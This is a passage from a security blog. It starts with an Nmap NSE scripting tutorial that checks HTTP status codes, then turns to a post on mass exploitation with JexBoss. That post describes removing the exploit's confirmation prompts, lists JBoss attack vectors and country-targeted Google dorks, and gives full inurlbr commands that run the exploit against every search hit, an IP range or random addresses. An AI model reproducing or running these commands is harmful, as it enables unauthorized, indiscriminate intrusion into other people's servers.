<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- writing output to table (using 'table.insert')</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">if</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">200</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" STRING FOUND: "</span><span class="sy0" style="color: #66cc66;">..</span>file<span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" returned 200 OK"</span><span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">404</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" STRING NOT FOUND: "</span><span class="sy0" style="color: #66cc66;">..</span>file<span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" returned 404 NOT FOUND"</span><span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">else</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" STRING : "</span><span class="sy0" style="color: #66cc66;">..</span>file<span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" returned "</span><span class="sy0" style="color: #66cc66;">..</span><span class="kw3" style="color: #0000aa;">tostring</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status<span class="br0" style="color: #66cc66;">)</span><span class="br0" style="color: #66cc66;">)</span> <span class="co1" style="color: grey; font-style: italic;">-- tostring guards against a nil status</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><span class="kw1" style="color: #aa9900; font-weight: bold;"><br /></span></li>
<li class="li1" style="-webkit-user-select: none;">--writing response output to table</li>
<li class="li2" style="-webkit-user-select: none;"><span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> stdnse<span class="sy0" style="color: #66cc66;">.</span>format_output<span class="br0" style="color: #66cc66;">(</span><span class="kw4" style="color: #aa9900;">true</span><span class="sy0" style="color: #66cc66;">,</span> response<span class="br0" style="color: #66cc66;">)</span><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
</ol>
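<div style="text-align: start;">A complete, minimal NSE script that ties together the status-code handling described for file-checker.nse and the output methods of this section. It is an added example, not the blog's file-checker.nse and not code from the Nmap project; the script name example-file-status, the STATUS_TEXT mapping and the <b>.file</b> argument are assumptions for illustration. It returns a stdnse.output_table() so that Nmap renders the result both as normal text and as XML fields, and it handles the case the listings above skip: response.status is nil when the server never answered, and concatenating a nil value aborts the script.</div>

```lua
-- example-file-status.nse (added example, not the blog's file-checker.nse)
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"

description = [[
Requests a single path on an HTTP service and reports the status code as
structured output. Added example for the "How To Display outputs" section.
]]

author = "added example"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"safe", "discovery"}

-- Only run against ports Nmap believes speak HTTP.
portrule = shortport.http

-- Human-readable meaning for the status codes handled in the page's listing,
-- extended here with two redirect codes (assumed mapping for illustration).
local STATUS_TEXT = {
  [200] = "OK (file found)",
  [301] = "Moved Permanently",
  [302] = "Found (redirect)",
  [403] = "Forbidden",
  [404] = "Not Found",
  [503] = "Service Unavailable",
}

-- THE RULES SECTION: the argument name is <script name>.file, default /robots.txt
local function requested_path()
  return stdnse.get_script_args(SCRIPT_NAME .. ".file") or "/robots.txt"
end

-- THE ACTION SECTION
action = function(host, port)
  local path = requested_path()
  local response = http.get(host, port, path)

  -- http.get returns a table even when the request fails; status is nil when
  -- no HTTP reply came back, so check that before comparing numbers.
  if not response or not response.status then
    return stdnse.format_output(false, "no HTTP response for " .. path)
  end

  -- output_table keeps the insertion order of the keys in the report.
  local out = stdnse.output_table()
  out.path = path
  out.status = response.status
  out.meaning = STATUS_TEXT[response.status] or "undefined"
  if response.header and response.header.location then
    out.location = response.header.location  -- where a 30x redirect points
  end
  out.found = (response.status == 200)

  return out
end
```

<div style="text-align: start;">Save it as example-file-status.nse in the scripts folder, run nmap --script-updatedb, then: sudo nmap -p 80 --script example-file-status --script-args example-file-status.file=/robots.txt <target>. Writing into a dedicated output table rather than into the http response table (as the table.insert listing does) keeps the script's own lines separate from the fields that http.get filled in.</div>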
<div style="text-align: start;">
<br />
<b></b><br />
<center>
<b>using stdnse.output_table()</b></center>
<br />
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px; text-align: start;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- writing output to table using stdnse.output_table()</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- THE RULES SECTION --</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> file <span class="sy0" style="color: #66cc66;">=</span> stdnse<span class="sy0" style="color: #66cc66;">.</span>get_script_args<span class="br0" style="color: #66cc66;">(</span>SCRIPT_NAME<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">".file"</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw2" style="color: #aa9900; font-weight: bold;">or</span> <span class="st0" style="color: #ff6666;">"/robots.txt"</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> output <span class="sy0" style="color: #66cc66;">=</span> stdnse<span class="sy0" style="color: #66cc66;">.</span>output_table<span class="br0" style="color: #66cc66;">(</span><span class="br0" style="color: #66cc66;">)</span> <span class="co1" style="color: grey; font-style: italic;">-- building the table in 'the rules section'</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- THE ACTION SECTION --</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">if</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">200</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li1"><pre>
      output.found = {}
      output.found[#output.found + 1] = file
      output.found[#output.found + 1] = "/privacy/"
      output.found[#output.found + 1] = "/news/"
      return output

    elseif (response.status == 404) then
      output.found = {}
      output.found[#output.found + 1] = file
      output.found[#output.found + 1] = "/privacy/"
      output.found[#output.found + 1] = "/news/"
      return output

    else
      output.found = {}
      output.found[#output.found + 1] = file
      output.found[#output.found + 1] = "/privacy/"
      output.found[#output.found + 1] = "/news/"
      return output

    end
  return output
end
</pre></li>
</ol>
</div>
</div>
</div>
</center>
Posted by Anonymous (http://www.blogger.com/profile/00185800187463626295)<br />
<br />
<b>JexBoss - JBoss Verify Tool - INURLBR Mass exploitation</b> (published 2015-06-19, updated 2015-11-29)<br />
<h3 style="text-align: center;">
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b>JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.</b></span></span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOdMPvnVrTzRfgjGDc14ZCCsRwcRpRqAkD5tlKiHemwcZLAmeGGXR9es-OYj2BGHiIVDFkKrI2oZ8xn1g3LPn2eiZ3_XPGKRCGV2aVZzsKrxUdsB0949IhyphenhyphenQPsvTIC7AiUgwtd6jBSfejn/s1600/Captura+de+tela+de+2015-06-19+18%253A09%253A39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. The script works as published; we modified the exploit so it can be run en masse with the inurlbr scanner: all interactive locks and confirmation prompts were removed, and a function to save vulnerable hosts was added." border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOdMPvnVrTzRfgjGDc14ZCCsRwcRpRqAkD5tlKiHemwcZLAmeGGXR9es-OYj2BGHiIVDFkKrI2oZ8xn1g3LPn2eiZ3_XPGKRCGV2aVZzsKrxUdsB0949IhyphenhyphenQPsvTIC7AiUgwtd6jBSfejn/s640/Captura+de+tela+de+2015-06-19+18%253A09%253A39.png" title="JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. The script works as published; we modified the exploit so it can be run en masse with the inurlbr scanner: all interactive locks and confirmation prompts were removed, and a function to save vulnerable hosts was added." width="640" /></a></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b><br /></b></span></span></div>
<b style="font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: x-large; line-height: 25.6000003814697px;">Requirements</b><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">Python 2.7.x (the script is written for Python 2)</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><b><br /></b></span></span>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b>Installation</b></span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">To install the latest version of JexBoss, please use the following commands:</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><br /></span></span>
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">git clone https://github.com/joaomatosf/jexboss.git</span></span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">cd jexboss</span></span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">python jexboss.py</span></span><br />
<br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"># <b> [ + ]</b> JexBoss v1.0. @autor: João Filho Matos Figueiredo (joaomatosf@gmail.com)</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"># <b> [ + ]</b> Updates: <a href="https://github.com/joaomatosf/jexboss">https://github.com/joaomatosf/jexboss</a></span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"># <b> [ + ] </b>SCRIPT original: <a href="http://1337day.com/exploit/23507">http://1337day.com/exploit/23507</a> - </span></span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;"><a href="http://77.120.105.55/exploit/23507">http://77.120.105.55/exploit/23507</a></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"># <b> [ + ] </b>Free for distribution and modification, but the authorship should be preserved.</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><br /></span></span>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b>Features</b></span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.</span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><br /></span></span>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b>The exploitation vectors are:</b></span></span><br />
<br />
<ol>
<li><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">/jmx-console - </span></span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">tested and working in JBoss versions 4, 5 and 6</span></li>
<li><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">/web-console/Invoker - </span></span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">tested and working in JBoss version 4</span></li>
<li><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">/invoker/JMXInvokerServlet - </span></span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">tested and working in JBoss versions 4 and 5</span></li>
</ol>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><br /></span></span></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><i>The script works as published; we modified the exploit so that it can be run en masse together with the <b>inurlbr</b> scanner.</i></span></span></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">All interactive locks and confirmation prompts were removed so the script runs unattended, and a function that saves vulnerable hosts to a file was added.</span><br /><br /><span style="line-height: 25.6000003814697px;"><span style="font-size: large;"><b>Mass exploitation: </b></span></span></span></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">For this we use the inurlbr scanner:</span></span></div>
<div>
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;"><a href="https://github.com/googleinurl/SCANNER-INURLBR">https://github.com/googleinurl/SCANNER-INURLBR</a></span></span><br />
<br /></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b>Modified script for mass exploitation: </b></span></span></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><a href="https://gist.github.com/googleinurl/d9940803b101c9ebbf54#file-jexboss-py">https://gist.github.com/googleinurl/d9940803b101c9ebbf54#file-jexboss-py</a> </span><br /><br /><span style="line-height: 25.6000003814697px;"><span style="font-size: large;"><b>SEARCH DORKS </b></span></span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">inurl:"jmx-console/HtmlAdaptor"</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">inurl:"</span></span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">"</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">inurl:"</span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">/invoker/JMXInvokerServlet"</span></span><br />
<br />
<span style="font-size: large;"><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-weight: bold;"><span style="line-height: 25.6000003814697px;">INURLBR COMMAND:</span></span><br /><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">- Single search: </span></span></span><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;"><i>--dork {YOUR_DORK}</i></span><span style="font-size: large;"><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><br /></span></span></span><br />
<span style="line-height: 25.6000003814697px;"><span style="color: red; font-family: "courier new" , "courier" , monospace;">php inurlbr.php --dork 'inurl:"jmx-console/HtmlAdaptor"' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_"</span></span></div>
<div>
<br /></div>
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">- Search using a dork file</span></div>
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">- Example dork file:</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:br inurl:"jmx-console/HtmlAdaptor"</span><br /><span style="line-height: 25.6000003814697px;">site:uk inurl:"jmx-console/HtmlAdaptor"</span></span></div>
<div>
<span style="line-height: 25.6000003814697px;"><span style="font-family: "courier new" , "courier" , monospace;">site:in inurl:"jmx-console/HtmlAdaptor"</span></span></div>
<div>
<span style="line-height: 25.6000003814697px;"><span style="font-family: "courier new" , "courier" , monospace;">site:ru inurl:"jmx-console/HtmlAdaptor"</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:pe inurl:"jmx-console/HtmlAdaptor"</span><span style="line-height: 25.6000003814697px;"><br /></span><span style="line-height: 25.6000003814697px;">site:br </span><span style="line-height: 25.6000003814697px;">inurl:"</span><span style="line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="line-height: 25.6000003814697px;">"</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:uk </span><span style="line-height: 25.6000003814697px;">inurl:"</span><span style="line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="line-height: 25.6000003814697px;">"</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:ru </span><span style="line-height: 25.6000003814697px;">inurl:"</span><span style="line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="line-height: 25.6000003814697px;">"</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:us </span><span style="line-height: 25.6000003814697px;">inurl:"</span><span style="line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="line-height: 25.6000003814697px;">"</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:com </span><span style="line-height: 25.6000003814697px;">inurl:"</span><span style="line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="line-height: 25.6000003814697px;">"</span></span></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">And so on.<br /><br /><i>Example: file dorks.txt, passed with </i></span></span><i style="color: red; font-family: 'Courier New', Courier, monospace; line-height: 25.6000003814697px;"><b>--dork-file {YOUR_DORK_FILE}</b></i><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><i><br /></i></span></span></div>
<div>
<span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">php inurlbr.php --dork-file 'dorks.txt' -s output.txt -q all --unique --command-all "python JexBoss</span><span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">.py _TARGET_"</span></span><br />
<br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">- Scanning an IP range: </span><b><i style="color: red; font-family: 'Courier New', Courier, monospace; line-height: 25.6000003814697px;">--</i><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">range</span><i style="color: red; font-family: 'Courier New', Courier, monospace; line-height: 25.6000003814697px;"> {</i><i style="color: red; font-family: 'Courier New', Courier, monospace; line-height: 25.6000003814697px;">IP</i><i style="color: red; font-family: 'Courier New', Courier, monospace; line-height: 25.6000003814697px;">_START,IP_END}</i></b><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span>
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">php inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_"</span></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">- Random IP addresses ({counter} addresses are generated): </span><b><i><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">--</span><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">range-rand</span><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;"> {</span><span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">counter}</span></span></i></b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span><br />
